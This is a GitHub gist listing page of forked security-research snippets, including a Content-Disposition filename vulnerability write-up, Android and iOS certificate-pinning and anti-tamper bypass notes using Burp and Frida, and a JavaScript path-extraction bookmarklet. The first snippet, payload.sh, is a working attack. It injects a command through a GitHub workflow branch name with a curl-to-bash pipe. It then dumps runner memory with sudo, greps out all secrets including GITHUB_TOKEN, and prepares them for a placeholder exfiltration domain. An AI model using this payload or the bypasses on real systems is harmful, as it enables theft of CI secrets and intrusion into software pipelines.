Skip to content

Instantly share code, notes, and snippets.

View AkshayJainG's full-sized avatar

AkshayJainG

26 followers · 326 following
View GitHub Profile
@AkshayJainG
AkshayJainG / payload.sh
Created December 1, 2023 06:34 — forked from AdnaneKhan/payload.sh
Universal "dump all secrets" payload for GitHub workflow branch name injection.
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
# Print to run log
echo $B64_BLOB
@AkshayJainG
AkshayJainG / lack_escape_content-disposition_filename.md
Created September 28, 2023 16:07 — forked from motoyasu-saburi/lack_escape_content-disposition_filename.md
Land Mine named "Content-Disposition > filename"

TL;DR

  • I found 1 browser, 1 language, and 15 vulnerabilities in { Web Framework, HTTP Client library, Email library / Web Service, etc }
  • All the vulnerabilities I found were found from a single perspective (I investigated maybe 50-80 products).
  • The RFC description of the problem (rather confusingly) describes the requirements for this problem, while the WHATWG > HTML Spec is well documented.
  • The problem is clearly targeted at the Content-Disposition fields filename and filename*.
  • This problem affects HTTP Request/Response/Email in different ways.
    • HTTP Request : request tampering (especially with file contents, tainting of other fields, etc.)
    • HTTP Response : Reflect File Download vulnerability
  • Email : Attachment tampering (e.g., extension and filename tampering and potential file content tampering)
@AkshayJainG
AkshayJainG / gist:2971fb673aa707464beca6ddf20fbaa9
Created August 1, 2023 14:01 — forked from sdcampbell/gist:35398cb2e0263a11ba6c329c3b1d8e05
Paste this into your browser developer console to print all URL paths found in all JavaScript loaded by the page.
javascript:(function(){var
scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;const
results=new Set;for(var i=0;i<scripts.length;i++){var
t=scripts[i].src;""!=t&&fetch(t).then(function(t){return
t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of
e)results.add(r[0])}).catch(function(t){console.log("An error occurred:
",t)})}var
pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const
match of matches)results.add(match[0]);function
writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
@AkshayJainG
AkshayJainG / android12burp.md
Created September 25, 2022 15:57 — forked from TobiasS1402/android12burp.md
Android 12 BurpSuite intercepting

generating certificate

My android 12 does not accept the default burp certificate, you have to generate a unique certificate. Then import this into burp and use the commands to make it compatible with Android.

mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash
@AkshayJainG
AkshayJainG / ios14-certificate-pinning-bypass.md
Created September 25, 2022 15:57 — forked from AkdM/ios14-certificate-pinning-bypass.md
iOS 14 app TLS decrypt / certificate pinning bypass steps

This is not a tutorial, just a small guide to myself but feel free to get some infos here.

Working on an iPhone 7 running iOS 14.5.1

  1. Jailbreak an iPhone/iPad/whatever

  2. If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.

  3. Get the PID of the app you want to capture traffic from with frida-ps -Ua ( a is for showing running apps only, you can -U to show all running processes instead)

@AkshayJainG
AkshayJainG / DOCKER-IN-AN-HOUR.md
Created March 27, 2022 19:15 — forked from leonjza/DOCKER-IN-AN-HOUR.md
Docker in an hour Workshop

docker-in-an-hour

@leonjza

Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.

toc

@AkshayJainG
AkshayJainG / bypassAntiTamper.js
Created March 21, 2022 11:29 — forked from rodnt/bypassAntiTamper.js
Simple Bypass iOS anti-tamper ptrace,systctl,strstr,getppid
/**
* Rodolfo 'rodnt' Tavares
* twitter @rodntt
* github rodnt
*/
if(ObjC.available) {
const tamperLibs = [
"Substrate",
@AkshayJainG
AkshayJainG / enc_str.cc
Created October 17, 2021 16:22 — forked from yujincheng08/enc_str.cc
Compile time encrypt string
#include "enc_str.h"
#include <cstdio>
static_assert(next_prime<next_prime<4>> == next_prime<4> && next_prime<4> == 5, "??");
static constexpr auto j = "I love vvb2060 and she's my wife."_senc;
static constexpr auto k = ".."_senc;
static constexpr auto l = j + k;
int main() {
@AkshayJainG
AkshayJainG / README.md
Created July 13, 2021 09:13 — forked from coaxial/README.md
unpinning SSL certs on Android apps with Frida to inspect network traffic with mitmproxy

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI)

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that you are a developer in Android (tap the build version enough times), adb debugging is enabled, and that android tools are installed on the host.

  • start mitmproxy on host
  • visit mitm.it on the target (after setting the proxy) and install the spoofed cert
@AkshayJainG
AkshayJainG / macho.js
Created April 25, 2021 15:56 — forked from ChiChou/macho.js
Frida in-memory Mach-O parser
// to speed up, I removed all data validation
function MemoryBuffer(address, size) {
this.base = address
if (!size) {
// const range = Process.findRangeByAddress(address)
// if (!range)
// throw new Error('invalid address: ' + address)